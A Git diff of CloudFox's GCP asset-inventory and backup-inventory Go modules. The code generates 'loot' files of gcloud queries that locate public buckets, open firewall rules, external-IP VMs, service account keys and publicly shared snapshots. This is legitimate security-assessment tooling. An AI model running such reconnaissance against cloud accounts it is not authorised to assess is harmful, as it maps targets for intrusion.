+ parts := strings.Split(resource, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return resource +} + +func (m *AssetInventoryModule) generateQueryTemplates() { + templates := []struct { + Name string + Description string + Query string + }{ + {"Public Storage Buckets", "Find all public GCS buckets", `resource.type="storage.googleapis.com/Bucket" AND resource.data.iamConfiguration.uniformBucketLevelAccess.enabled=false`}, + {"VMs with External IPs", "Find compute instances with external IP addresses", `resource.type="compute.googleapis.com/Instance" AND resource.data.networkInterfaces.accessConfigs:*`}, + {"Service Account Keys", "Find all user-managed service account keys", `resource.type="iam.googleapis.com/ServiceAccountKey" AND resource.data.keyType="USER_MANAGED"`}, + {"Firewall Rules - Open to Internet", "Find firewall rules allowing 0.0.0.0/0", `resource.type="compute.googleapis.com/Firewall" AND resource.data.sourceRanges:"0.0.0.0/0"`}, + {"Cloud SQL - Public IPs", "Find Cloud SQL instances with public IP", `resource.type="sqladmin.googleapis.com/Instance" AND resource.data.settings.ipConfiguration.ipv4Enabled=true`}, + {"Unencrypted Disks", "Find disks without customer-managed encryption", `resource.type="compute.googleapis.com/Disk" AND NOT resource.data.diskEncryptionKey:*`}, + {"GKE Clusters - Legacy Auth", "Find GKE clusters with legacy authentication", `resource.type="container.googleapis.com/Cluster" AND resource.data.legacyAbac.enabled=true`}, + } + + for _, t := range templates { + m.LootMap["asset-inventory-commands"].Contents += fmt.Sprintf( + "# %s - %s\ngcloud asset search-all-resources --scope=projects/PROJECT_ID --query='%s'\n\n", + t.Name, t.Description, t.Query, + ) + } + + // Add export commands + m.LootMap["asset-inventory-commands"].Contents += "# Export complete asset inventory\n" + for _, projectID := range m.ProjectIDs { + m.LootMap["asset-inventory-commands"].Contents += fmt.Sprintf( + "gcloud asset export --project=%s --content-type=resource --output-path=gs://BUCKET_NAME/%s-assets.json\n", + projectID, projectID, + ) + } +} + func (m *AssetInventoryModule) initializeLootFiles() { - m.LootMap["asset-inventory"] = &internal.LootFile{ - Name: "asset-inventory", - Contents: "# Cloud Asset Inventory\n# Generated by CloudFox\n\n", + m.LootMap["asset-inventory-details"] = &internal.LootFile{ + Name: "asset-inventory-details", + Contents: "# Cloud Asset Inventory Details\n# Generated by CloudFox\n\n", } - m.LootMap["public-assets"] = &internal.LootFile{ - Name: "public-assets", - Contents: "", + m.LootMap["asset-inventory-commands"] = &internal.LootFile{ + Name: "asset-inventory-commands", + Contents: "# Cloud Asset Inventory Commands\n# Generated by CloudFox\n\n", } } func (m *AssetInventoryModule) addToLoot(asset assetservice.AssetInfo) { - m.LootMap["asset-inventory"].Contents += fmt.Sprintf( - "# Asset: %s\n# Type: %s\n# Project: %s\n# Location: %s\n\n", + m.LootMap["asset-inventory-details"].Contents += fmt.Sprintf( + "# Asset: %s\n# Type: %s\n# Project: %s\n# Location: %s\n", asset.Name, asset.AssetType, asset.ProjectID, asset.Location) if asset.PublicAccess { - m.LootMap["public-assets"].Contents += fmt.Sprintf("%s (%s)\n", asset.Name, asset.AssetType) + m.LootMap["asset-inventory-details"].Contents += "# Public Access: Yes\n" } + m.LootMap["asset-inventory-details"].Contents += "\n" } func (m *AssetInventoryModule) writeOutput(ctx context.Context, logger internal.Logger) { var tables []internal.TableFile - if showCounts { + // Asset counts table (if we have counts) + if len(m.TypeCounts) > 0 { // Sort by count descending sort.Slice(m.TypeCounts, func(i, j int) bool { return m.TypeCounts[i].Count > m.TypeCounts[j].Count @@ -238,60 +523,152 @@ func (m *AssetInventoryModule) writeOutput(ctx context.Context, logger internal. Header: header, Body: body, }) - } else { - header := []string{"Name", "Asset Type", "Location", "Project Name", "Project"} + } + + // Assets table (if we have assets) + if len(m.Assets) > 0 { if checkIAM { - header = append(header, "IAM Bindings", "Public Access", "Risk") - } + // When checking IAM, show one row per IAM binding member + header := []string{"Project ID", "Project Name", "Name", "Asset Type", "Location", "Role", "Member", "Public"} - var body [][]string - for _, asset := range m.Assets { - row := []string{ - asset.Name, - assetservice.ExtractAssetTypeShort(asset.AssetType), - asset.Location, - m.GetProjectName(asset.ProjectID), - asset.ProjectID, - } - if checkIAM { + var body [][]string + for _, asset := range m.Assets { publicAccess := "No" if asset.PublicAccess { publicAccess = "Yes" } - row = append(row, fmt.Sprintf("%d", asset.IAMBindings), publicAccess, asset.RiskLevel) + + // If no IAM bindings, still show the asset + if len(asset.IAMBindings) == 0 { + body = append(body, []string{ + asset.ProjectID, + m.GetProjectName(asset.ProjectID), + asset.Name, + assetservice.ExtractAssetTypeShort(asset.AssetType), + asset.Location, + "-", + "-", + publicAccess, + }) + } else { + // One row per member per role + for _, binding := range asset.IAMBindings { + for _, member := range binding.Members { + body = append(body, []string{ + asset.ProjectID, + m.GetProjectName(asset.ProjectID), + asset.Name, + assetservice.ExtractAssetTypeShort(asset.AssetType), + asset.Location, + binding.Role, + member, + publicAccess, + }) + } + } + } } - body = append(body, row) - } - tables = append(tables, internal.TableFile{ - Name: "assets", - Header: header, - Body: body, - }) + tables = append(tables, internal.TableFile{ + Name: "assets", + Header: header, + Body: body, + }) - // Public assets table (if checking IAM) - if checkIAM { + // Public assets table var publicBody [][]string for _, asset := range m.Assets { if asset.PublicAccess { - publicBody = append(publicBody, []string{ - asset.Name, - asset.AssetType, - asset.RiskLevel, - strings.Join(asset.RiskReasons, "; "), - m.GetProjectName(asset.ProjectID), - asset.ProjectID, - }) + for _, binding := range asset.IAMBindings { + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + publicBody = append(publicBody, []string{ + asset.ProjectID, + m.GetProjectName(asset.ProjectID), + asset.Name, + asset.AssetType, + binding.Role, + member, + }) + } + } + } } } if len(publicBody) > 0 { tables = append(tables, internal.TableFile{ Name: "public-assets", - Header: []string{"Name", "Asset Type", "Risk Level", "Reasons", "Project Name", "Project"}, + Header: []string{"Project ID", "Project Name", "Name", "Asset Type", "Role", "Member"}, Body: publicBody, }) } + } else { + // Basic listing without IAM + header := []string{"Project ID", "Project Name", "Name", "Asset Type", "Location"} + var body [][]string + for _, asset := range m.Assets { + body = append(body, []string{ + asset.ProjectID, + m.GetProjectName(asset.ProjectID), + asset.Name, + assetservice.ExtractAssetTypeShort(asset.AssetType), + asset.Location, + }) + } + tables = append(tables, internal.TableFile{ + Name: "assets", + Header: header, + Body: body, + }) + } + } + + // Dependencies table (if we have dependencies) + if len(m.Dependencies) > 0 { + depsHeader := []string{"Project ID", "Project Name", "Source", "Dependency Type", "Target", "Target Type"} + var depsBody [][]string + for _, d := range m.Dependencies { + depsBody = append(depsBody, []string{ + d.ProjectID, + m.GetProjectName(d.ProjectID), + m.extractResourceName(d.SourceResource), + d.DependencyType, + m.extractResourceName(d.TargetResource), + assetservice.ExtractAssetTypeShort(d.TargetType), + }) + + // Add to loot + m.LootMap["asset-inventory-details"].Contents += fmt.Sprintf( + "# Dependency: %s -> %s (%s)\n", + m.extractResourceName(d.SourceResource), + m.extractResourceName(d.TargetResource), + d.DependencyType, + ) } + tables = append(tables, internal.TableFile{ + Name: "asset-dependencies", + Header: depsHeader, + Body: depsBody, + }) + } + + // Cross-project resources table (if we have cross-project resources) + if len(m.CrossProject) > 0 { + crossHeader := []string{"Resource", "Type", "Owner Project", "Accessed From"} + var crossBody [][]string + for _, c := range m.CrossProject { + crossBody = append(crossBody, []string{ + m.extractResourceName(c.ResourceName), + assetservice.ExtractAssetTypeShort(c.ResourceType), + c.OwnerProject, + strings.Join(c.AccessedFrom, ", "), + }) + } + tables = append(tables, internal.TableFile{ + Name: "cross-project-resources", + Header: crossHeader, + Body: crossBody, + }) } var lootFiles []internal.LootFile diff --git a/gcp/commands/backupinventory.go b/gcp/commands/backupinventory.go index 911fdaf7..09d5a602 100644 --- a/gcp/commands/backupinventory.go +++ b/gcp/commands/backupinventory.go @@ -3,7 +3,6 @@ package commands import ( "context" "fmt" - "sort" "strings" "sync" "time" @@ -29,17 +28,9 @@ var GCPBackupInventoryCommand = &cobra.Command{ Features: - Compute Engine disk snapshots and snapshot schedules - Cloud SQL automated backups and point-in-time recovery -- Cloud Storage object versioning and lifecycle policies -- Filestore backups -- GKE backup configurations - Identifies unprotected resources (no backup coverage) - Analyzes backup retention policies -- Checks for stale or failing backups - -Requires appropriate IAM permissions: -- roles/compute.viewer -- roles/cloudsql.viewer -- roles/storage.admin`, +- Checks for stale or failing backups`, Run: runGCPBackupInventoryCommand, } @@ -47,82 +38,41 @@ Requires appropriate IAM permissions: // Data Structures // ------------------------------ -type BackupPolicy struct { - Name string - ProjectID string - ResourceType string // compute-snapshot, sql-backup, gcs-versioning, filestore-backup - Enabled bool - Schedule string - RetentionDays int - LastBackup string - BackupCount int - TargetResources []string - Location string - Status string - Encryption string -} - -type ProtectedResource struct { - Name string +type BackupResource struct { ProjectID string - ResourceType string - BackupType string + Name string + ResourceType string // compute-disk, cloudsql-instance + Location string + SizeGB int64 + Protected bool + BackupType string // snapshot, automated, none + Schedule string + RetentionDays int LastBackup string BackupCount int - RetentionDays int BackupStatus string PITREnabled bool BackupLocation string } -type UnprotectedResource struct { - Name string - ProjectID string - ResourceType string - Location string - SizeGB int64 - RiskLevel string - Reason string - Remediation string +type IAMBinding struct { + Role string + Members []string } type ComputeSnapshot struct { - Name string ProjectID string + Name string SourceDisk string Status string DiskSizeGB int64 StorageBytes int64 CreationTime string - Labels map[string]string StorageLocats []string - AutoDelete bool + AutoCreated bool SnapshotType string -} - -type SnapshotSchedule struct { - Name string - ProjectID string - Region string - Schedule string - RetentionDays int - AttachedDisks int - SnapshotLabels map[string]string - StorageLocats []string -} - -type SQLBackup struct { - InstanceName string - ProjectID string - BackupID string - Status string - Type string - StartTime string - EndTime string - WindowStartTim string - SizeBytes int64 - Location string - Encrypted bool + IAMBindings []IAMBinding + PublicAccess bool } // ------------------------------ @@ -131,21 +81,28 @@ type SQLBackup struct { type BackupInventoryModule struct { gcpinternal.BaseGCPModule - // Module-specific fields - BackupPolicies []BackupPolicy - ProtectedResources []ProtectedResource - UnprotectedResources []UnprotectedResource - Snapshots []ComputeSnapshot - SnapshotSchedules []SnapshotSchedule - SQLBackups []SQLBackup - LootMap map[string]*internal.LootFile - mu sync.Mutex + Resources []BackupResource + Snapshots []ComputeSnapshot + LootMap map[string]*internal.LootFile + mu sync.Mutex // Tracking maps - disksWithBackups map[string]bool - sqlWithBackups map[string]bool - allDisks map[string]int64 // disk name -> size GB - allSQLInstances map[string]bool + disksWithBackups map[string]bool + sqlWithBackups map[string]bool + allDisks map[string]diskInfo + allSQLInstances map[string]sqlInstanceInfo +} + +type diskInfo struct { + SizeGB int64 + Zone string + ProjectID string + Name string +} + +type sqlInstanceInfo struct { + ProjectID string + Region string } // ------------------------------ @@ -163,32 +120,23 @@ func (o BackupInventoryOutput) LootFiles() []internal.LootFile { return o.Loot // Command Entry Point // ------------------------------ func runGCPBackupInventoryCommand(cmd *cobra.Command, args []string) { - // Initialize command context cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_BACKUPINVENTORY_MODULE_NAME) if err != nil { return } - // Create module instance module := &BackupInventoryModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - BackupPolicies: []BackupPolicy{}, - ProtectedResources: []ProtectedResource{}, - UnprotectedResources: []UnprotectedResource{}, - Snapshots: []ComputeSnapshot{}, - SnapshotSchedules: []SnapshotSchedule{}, - SQLBackups: []SQLBackup{}, - LootMap: make(map[string]*internal.LootFile), - disksWithBackups: make(map[string]bool), - sqlWithBackups: make(map[string]bool), - allDisks: make(map[string]int64), - allSQLInstances: make(map[string]bool), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Resources: []BackupResource{}, + Snapshots: []ComputeSnapshot{}, + LootMap: make(map[string]*internal.LootFile), + disksWithBackups: make(map[string]bool), + sqlWithBackups: make(map[string]bool), + allDisks: make(map[string]diskInfo), + allSQLInstances: make(map[string]sqlInstanceInfo), } - // Initialize loot files module.initializeLootFiles() - - // Execute enumeration module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -196,9 +144,8 @@ func runGCPBackupInventoryCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *BackupInventoryModule) Execute(ctx context.Context, logger internal.Logger) { - logger.InfoM("Inventorying backup configurations and identifying gaps...", GCP_BACKUPINVENTORY_MODULE_NAME) + logger.InfoM("Inventorying backup configurations...", GCP_BACKUPINVENTORY_MODULE_NAME) - // Create service clients computeService, err := compute.NewService(ctx) if err != nil { logger.ErrorM(fmt.Sprintf("Failed to create Compute service: %v", err), GCP_BACKUPINVENTORY_MODULE_NAME) @@ -212,7 +159,6 @@ func (m *BackupInventoryModule) Execute(ctx context.Context, logger internal.Log } } - // Process each project var wg sync.WaitGroup for _, projectID := range m.ProjectIDs { wg.Add(1) @@ -224,25 +170,43 @@ func (m *BackupInventoryModule) Execute(ctx context.Context, logger internal.Log wg.Wait() // Identify unprotected resources - m.identifyUnprotectedResources(logger) + m.identifyUnprotectedResources() - // Check results - totalProtected := len(m.ProtectedResources) - totalUnprotected := len(m.UnprotectedResources) - - if totalProtected == 0 && totalUnprotected == 0 { + if len(m.Resources) == 0 && len(m.Snapshots) == 0 { logger.InfoM("No backup data found", GCP_BACKUPINVENTORY_MODULE_NAME) return } - logger.SuccessM(fmt.Sprintf("Found %d protected resource(s), %d unprotected resource(s)", - totalProtected, totalUnprotected), GCP_BACKUPINVENTORY_MODULE_NAME) + // Count protected vs unprotected + protectedCount := 0 + unprotectedCount := 0 + for _, r := range m.Resources { + if r.Protected { + protectedCount++ + } else { + unprotectedCount++ + } + } + + // Count public snapshots + publicSnapshotCount := 0 + for _, s := range m.Snapshots { + if s.PublicAccess { + publicSnapshotCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d resource(s): %d protected, %d unprotected, %d snapshot(s)", + len(m.Resources), protectedCount, unprotectedCount, len(m.Snapshots)), GCP_BACKUPINVENTORY_MODULE_NAME) - if totalUnprotected > 0 { - logger.InfoM(fmt.Sprintf("[FINDING] %d resource(s) without backup coverage", totalUnprotected), GCP_BACKUPINVENTORY_MODULE_NAME) + if unprotectedCount > 0 { + logger.InfoM(fmt.Sprintf("Found %d resource(s) without backup coverage", unprotectedCount), GCP_BACKUPINVENTORY_MODULE_NAME) + } + + if publicSnapshotCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible snapshot(s)!", publicSnapshotCount), GCP_BACKUPINVENTORY_MODULE_NAME) } - // Write output m.writeOutput(ctx, logger) } @@ -260,9 +224,6 @@ func (m *BackupInventoryModule) processProject(ctx context.Context, projectID st // List snapshots m.enumerateSnapshots(ctx, projectID, computeService, logger) - // List snapshot schedules - m.enumerateSnapshotSchedules(ctx, projectID, computeService, logger) - // List SQL instances and backups if sqlService != nil { m.enumerateSQLBackups(ctx, projectID, sqlService, logger) @@ -272,13 +233,18 @@ func (m *BackupInventoryModule) processProject(ctx context.Context, projectID st func (m *BackupInventoryModule) enumerateDisks(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { req := computeService.Disks.AggregatedList(projectID) err := req.Pages(ctx, func(page *compute.DiskAggregatedList) error { - for _, diskList := range page.Items { + for zone, diskList := range page.Items { if diskList.Disks == nil { continue } for _, disk := range diskList.Disks { m.mu.Lock() - m.allDisks[disk.SelfLink] = disk.SizeGb + m.allDisks[disk.SelfLink] = diskInfo{ + SizeGB: disk.SizeGb, + Zone: m.extractZoneFromURL(zone), + ProjectID: projectID, + Name: disk.Name, + } m.mu.Unlock() } } @@ -297,22 +263,37 @@ func (m *BackupInventoryModule) enumerateSnapshots(ctx context.Context, projectI err := req.Pages(ctx, func(page *compute.SnapshotList) error { for _, snapshot := range page.Items { snap := ComputeSnapshot{ - Name: snapshot.Name, ProjectID: projectID, + Name: snapshot.Name, SourceDisk: snapshot.SourceDisk, Status: snapshot.Status, DiskSizeGB: snapshot.DiskSizeGb, StorageBytes: snapshot.StorageBytes, CreationTime: snapshot.CreationTimestamp, - Labels: snapshot.Labels, StorageLocats: snapshot.StorageLocations, - AutoDelete: snapshot.AutoCreated, + AutoCreated: snapshot.AutoCreated, SnapshotType: snapshot.SnapshotType, } + // Get IAM policy for this snapshot + iamPolicy, iamErr := computeService.Snapshots.GetIamPolicy(projectID, snapshot.Name).Context(ctx).Do() + if iamErr == nil && iamPolicy != nil { + for _, binding := range iamPolicy.Bindings { + snap.IAMBindings = append(snap.IAMBindings, IAMBinding{ + Role: binding.Role, + Members: binding.Members, + }) + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + snap.PublicAccess = true + } + } + } + } + m.mu.Lock() m.Snapshots = append(m.Snapshots, snap) - // Mark disk as having backups m.disksWithBackups[snapshot.SourceDisk] = true m.mu.Unlock() } @@ -353,101 +334,38 @@ func (m *BackupInventoryModule) trackSnapshotProtection(projectID string) { } } - protected := ProtectedResource{ - Name: m.extractDiskName(diskURL), - ProjectID: projectID, - ResourceType: "compute-disk", - BackupType: "snapshot", - LastBackup: latestSnap.CreationTime, - BackupCount: len(snaps), - BackupStatus: latestSnap.Status, - BackupLocation: strings.Join(latestSnap.StorageLocats, ","), - } + diskInfo := m.allDisks[diskURL] + backupStatus := latestSnap.Status // Calculate age of last backup if !latestTime.IsZero() { age := time.Since(latestTime) if age > 7*24*time.Hour { - protected.BackupStatus = "STALE" + backupStatus = "STALE" } else { - protected.BackupStatus = "CURRENT" + backupStatus = "CURRENT" } } - m.ProtectedResources = append(m.ProtectedResources, protected) - } -} - -func (m *BackupInventoryModule) enumerateSnapshotSchedules(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { - req := computeService.ResourcePolicies.AggregatedList(projectID) - err := req.Pages(ctx, func(page *compute.ResourcePolicyAggregatedList) error { - for region, policyList := range page.Items { - if policyList.ResourcePolicies == nil { - continue - } - for _, policy := range policyList.ResourcePolicies { - if policy.SnapshotSchedulePolicy == nil { - continue - } - - schedule := SnapshotSchedule{ - Name: policy.Name, - ProjectID: projectID, - Region: m.extractRegionFromURL(region), - } - - // Parse schedule - if policy.SnapshotSchedulePolicy.Schedule != nil { - if policy.SnapshotSchedulePolicy.Schedule.DailySchedule != nil { - schedule.Schedule = "daily" - } else if policy.SnapshotSchedulePolicy.Schedule.WeeklySchedule != nil { - schedule.Schedule = "weekly" - } else if policy.SnapshotSchedulePolicy.Schedule.HourlySchedule != nil { - schedule.Schedule = "hourly" - } - } - - // Parse retention - if policy.SnapshotSchedulePolicy.RetentionPolicy != nil { - schedule.RetentionDays = int(policy.SnapshotSchedulePolicy.RetentionPolicy.MaxRetentionDays) - } - - // Parse labels - if policy.SnapshotSchedulePolicy.SnapshotProperties != nil { - schedule.SnapshotLabels = policy.SnapshotSchedulePolicy.SnapshotProperties.Labels - schedule.StorageLocats = policy.SnapshotSchedulePolicy.SnapshotProperties.StorageLocations - } - - m.mu.Lock() - m.SnapshotSchedules = append(m.SnapshotSchedules, schedule) - - // Add as backup policy - bp := BackupPolicy{ - Name: policy.Name, - ProjectID: projectID, - ResourceType: "compute-snapshot-schedule", - Enabled: true, - Schedule: schedule.Schedule, - RetentionDays: schedule.RetentionDays, - Location: schedule.Region, - Status: policy.Status, - } - m.BackupPolicies = append(m.BackupPolicies, bp) - m.mu.Unlock() - } + resource := BackupResource{ + ProjectID: projectID, + Name: m.extractDiskName(diskURL), + ResourceType: "compute-disk", + Location: diskInfo.Zone, + SizeGB: diskInfo.SizeGB, + Protected: true, + BackupType: "snapshot", + LastBackup: latestSnap.CreationTime, + BackupCount: len(snaps), + BackupStatus: backupStatus, + BackupLocation: strings.Join(latestSnap.StorageLocats, ","), } - return nil - }) - if err != nil { - m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, GCP_BACKUPINVENTORY_MODULE_NAME, - fmt.Sprintf("Could not enumerate snapshot schedules in project %s", projectID)) + m.Resources = append(m.Resources, resource) } } func (m *BackupInventoryModule) enumerateSQLBackups(ctx context.Context, projectID string, sqlService *sqladmin.Service, logger internal.Logger) { - // List SQL instances instances, err := sqlService.Instances.List(projectID).Do() if err != nil { m.CommandCounter.Error++ @@ -458,7 +376,10 @@ func (m *BackupInventoryModule) enumerateSQLBackups(ctx context.Context, project for _, instance := range instances.Items { m.mu.Lock() - m.allSQLInstances[instance.Name] = true + m.allSQLInstances[instance.Name] = sqlInstanceInfo{ + ProjectID: projectID, + Region: instance.Region, + } m.mu.Unlock() // Check backup configuration @@ -479,76 +400,44 @@ func (m *BackupInventoryModule) enumerateSQLBackups(ctx context.Context, project m.sqlWithBackups[instance.Name] = true m.mu.Unlock() - // Add as backup policy - bp := BackupPolicy{ - Name: fmt.Sprintf("%s-backup", instance.Name), - ProjectID: projectID, - ResourceType: "sql-automated-backup", - Enabled: true, - Schedule: fmt.Sprintf("Daily at %s", backupStartTime), - RetentionDays: retentionDays, - TargetResources: []string{instance.Name}, - Location: instance.Region, - Status: "ACTIVE", - } - - m.mu.Lock() - m.BackupPolicies = append(m.BackupPolicies, bp) - m.mu.Unlock() - } - - // List actual backups for this instance - backups, err := sqlService.BackupRuns.List(projectID, instance.Name).Do() - if err != nil { - continue - } - - var latestBackup *SQLBackup - backupCount := 0 - - for _, backup := range backups.Items { - sqlBackup := SQLBackup{ - InstanceName: instance.Name, - ProjectID: projectID, - BackupID: fmt.Sprintf("%d", backup.Id), - Status: backup.Status, - Type: backup.Type, - StartTime: backup.StartTime, - EndTime: backup.EndTime, - WindowStartTim: backup.WindowStartTime, - Location: backup.Location, + // List actual backups for this instance + backups, err := sqlService.BackupRuns.List(projectID, instance.Name).Do() + if err != nil { + continue } - m.mu.Lock() - m.SQLBackups = append(m.SQLBackups, sqlBackup) - m.mu.Unlock() - - backupCount++ - if latestBackup == nil || backup.StartTime > latestBackup.StartTime { - latestBackup = &sqlBackup - } - } - - // Add as protected resource - if backupCount > 0 { - protected := ProtectedResource{ - Name: instance.Name, - ProjectID: projectID, - ResourceType: "cloudsql-instance", - BackupType: "automated", - BackupCount: backupCount, - RetentionDays: retentionDays, - PITREnabled: pitrEnabled, + var latestBackupTime string + var latestStatus string + var latestLocation string + backupCount := 0 + + for _, backup := range backups.Items { + backupCount++ + if latestBackupTime == "" || backup.StartTime > latestBackupTime { + latestBackupTime = backup.StartTime + latestStatus = backup.Status + latestLocation = backup.Location + } } - if latestBackup != nil { - protected.LastBackup = latestBackup.StartTime - protected.BackupStatus = latestBackup.Status - protected.BackupLocation = latestBackup.Location + resource := BackupResource{ + ProjectID: projectID, + Name: instance.Name, + ResourceType: "cloudsql-instance", + Location: instance.Region, + Protected: true, + BackupType: "automated", + Schedule: fmt.Sprintf("Daily at %s", backupStartTime), + RetentionDays: retentionDays, + LastBackup: latestBackupTime, + BackupCount: backupCount, + BackupStatus: latestStatus, + PITREnabled: pitrEnabled, + BackupLocation: latestLocation, } m.mu.Lock() - m.ProtectedResources = append(m.ProtectedResources, protected) + m.Resources = append(m.Resources, resource) m.mu.Unlock() } } @@ -557,68 +446,60 @@ func (m *BackupInventoryModule) enumerateSQLBackups(ctx context.Context, project // ------------------------------ // Gap Analysis // ------------------------------ -func (m *BackupInventoryModule) identifyUnprotectedResources(logger internal.Logger) { +func (m *BackupInventoryModule) identifyUnprotectedResources() { m.mu.Lock() defer m.mu.Unlock() // Find disks without snapshots - for diskURL, sizeGB := range m.allDisks { + for diskURL, info := range m.allDisks { if !m.disksWithBackups[diskURL] { - diskName := m.extractDiskName(diskURL) - projectID := m.extractProjectFromURL(diskURL) - - unprotected := UnprotectedResource{ - Name: diskName, - ProjectID: projectID, + resource := BackupResource{ + ProjectID: info.ProjectID, + Name: info.Name, ResourceType: "compute-disk", - Location: m.extractZoneFromURL(diskURL), - SizeGB: sizeGB, - RiskLevel: "HIGH", - Reason: "No snapshot backup found", - Remediation: fmt.Sprintf("Create snapshot schedule: gcloud compute resource-policies create snapshot-schedule %s-backup --project=%s --region=REGION --max-retention-days=30 --daily-schedule", diskName, projectID), + Location: info.Zone, + SizeGB: info.SizeGB, + Protected: false, + BackupType: "none", } - // Higher risk for larger disks - if sizeGB > 500 { - unprotected.RiskLevel = "CRITICAL" - } - - m.UnprotectedResources = append(m.UnprotectedResources, unprotected) + m.Resources = append(m.Resources, resource) // Add to loot - m.LootMap["unprotected-vms"].Contents += fmt.Sprintf( - "%s (%s) - %dGB - %s\n", - diskName, projectID, sizeGB, unprotected.Reason, + m.LootMap["backup-inventory-commands"].Contents += fmt.Sprintf( + "# Unprotected disk: %s (%s) - %dGB\n"+ + "gcloud compute resource-policies create snapshot-schedule %s-backup \\\n"+ + " --project=%s \\\n"+ + " --region=%s \\\n"+ + " --max-retention-days=30 \\\n"+ + " --daily-schedule\n\n", + info.Name, info.ProjectID, info.SizeGB, + info.Name, info.ProjectID, m.extractRegionFromZone(info.Zone), ) } } // Find SQL instances without backups - for instanceName := range m.allSQLInstances { + for instanceName, info := range m.allSQLInstances { if !m.sqlWithBackups[instanceName] { - unprotected := UnprotectedResource{ + resource := BackupResource{ + ProjectID: info.ProjectID, Name: instanceName, ResourceType: "cloudsql-instance", - RiskLevel: "CRITICAL", - Reason: "Automated backups not enabled", - Remediation: fmt.Sprintf("gcloud sql instances patch %s --backup-start-time=02:00 --enable-bin-log", instanceName), + Location: info.Region, + Protected: false, + BackupType: "none", } - m.UnprotectedResources = append(m.UnprotectedResources, unprotected) - - m.LootMap["unprotected-vms"].Contents += fmt.Sprintf( - "%s (Cloud SQL) - %s\n", - instanceName, unprotected.Reason, - ) - } - } + m.Resources = append(m.Resources, resource) - // Check for short retention policies - for _, policy := range m.BackupPolicies { - if policy.RetentionDays > 0 && policy.RetentionDays < 7 { - m.LootMap["short-retention"].Contents += fmt.Sprintf( - "%s (%s) - %d days retention (recommended: 30+ days)\n", - policy.Name, policy.ResourceType, policy.RetentionDays, + // Add to loot + m.LootMap["backup-inventory-commands"].Contents += fmt.Sprintf( + "# Unprotected SQL instance: %s\n"+ + "gcloud sql instances patch %s \\\n"+ + " --backup-start-time=02:00 \\\n"+ + " --enable-bin-log\n\n", + instanceName, instanceName, ) } } @@ -635,18 +516,6 @@ func (m *BackupInventoryModule) extractDiskName(url string) string { return url } -func (m *BackupInventoryModule) extractProjectFromURL(url string) string { - if strings.Contains(url, "projects/") { - parts := strings.Split(url, "/") - for i, part := range parts { - if part == "projects" && i+1 < len(parts) { - return parts[i+1] - } - } - } - return "" -} - func (m *BackupInventoryModule) extractZoneFromURL(url string) string { if strings.Contains(url, "zones/") { parts := strings.Split(url, "/") @@ -659,37 +528,26 @@ func (m *BackupInventoryModule) extractZoneFromURL(url string) string { return "" } -func (m *BackupInventoryModule) extractRegionFromURL(url string) string { - if strings.Contains(url, "regions/") { - parts := strings.Split(url, "/") - for i, part := range parts { - if part == "regions" && i+1 < len(parts) { - return parts[i+1] - } - } +func (m *BackupInventoryModule) extractRegionFromZone(zone string) string { + if zone == "" { + return "" } - return url + // Zone format: us-central1-a -> Region: us-central1 + parts := strings.Split(zone, "-") + if len(parts) >= 2 { + return strings.Join(parts[:len(parts)-1], "-") + } + return zone } // ------------------------------ // Loot File Management // ------------------------------ func (m *BackupInventoryModule) initializeLootFiles() { - m.LootMap["unprotected-vms"] = &internal.LootFile{ - Name: "unprotected-vms", - Contents: "# Unprotected VMs and Resources\n# Generated by CloudFox\n# These resources have no backup coverage!\n\n", - } - m.LootMap["short-retention"] = &internal.LootFile{ - Name: "short-retention", - Contents: "# Resources with Short Backup Retention\n# Generated by CloudFox\n\n", - } - m.LootMap["backup-commands"] = &internal.LootFile{ - Name: "backup-commands", - Contents: "# Backup Setup Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["backup-inventory"] = &internal.LootFile{ - Name: "backup-inventory", - Contents: "# Full Backup Inventory\n# Generated by CloudFox\n\n", + m.LootMap["backup-inventory-commands"] = &internal.LootFile{ + Name: "backup-inventory-commands", + Contents: "# Backup Inventory Commands\n" + + "# Generated by CloudFox\n\n", } } @@ -697,130 +555,154 @@ func (m *BackupInventoryModule) initializeLootFiles() { // Output Generation // ------------------------------ func (m *BackupInventoryModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Sort protected resources by type and name - sort.Slice(m.ProtectedResources, func(i, j int) bool { - if m.ProtectedResources[i].ResourceType != m.ProtectedResources[j].ResourceType { - return m.ProtectedResources[i].ResourceType < m.ProtectedResources[j].ResourceType + var tables []internal.TableFile + + // Main backup inventory table (all resources) + if len(m.Resources) > 0 { + header := []string{ + "Project ID", + "Project Name", + "Resource", + "Type", + "Location", + "Size (GB)", + "Protected", + "Backup Type", + "Schedule", + "Retention", + "Last Backup", + "Count", + "Status", + "PITR", } - return m.ProtectedResources[i].Name < m.ProtectedResources[j].Name - }) - // Protected Resources table - protectedHeader := []string{ - "Resource", - "Project Name", - "Project ID", - "Type", - "Backup Type", - "Last Backup", - "Count", - "Status", - "PITR", - } + var body [][]string + for _, r := range m.Resources { + protectedStr := "No" + if r.Protected { + protectedStr = "Yes" + } - var protectedBody [][]string - for _, r := range m.ProtectedResources { - pitr := "No" - if r.PITREnabled { - pitr = "Yes" - } + pitrStr := "No" + if r.PITREnabled { + pitrStr = "Yes" + } - protectedBody = append(protectedBody, []string{ - r.Name, - m.GetProjectName(r.ProjectID), - r.ProjectID, - r.ResourceType, - r.BackupType, - truncateString(r.LastBackup, 20), - fmt.Sprintf("%d", r.BackupCount), - r.BackupStatus, - pitr, - }) + retentionStr := "" + if r.RetentionDays > 0 { + retentionStr = fmt.Sprintf("%d days", r.RetentionDays) + } - // Add to inventory loot - m.LootMap["backup-inventory"].Contents += fmt.Sprintf( - "%s (%s) - %s - Last: %s - Count: %d\n", - r.Name, r.ResourceType, r.BackupType, r.LastBackup, r.BackupCount, - ) - } + sizeStr := "" 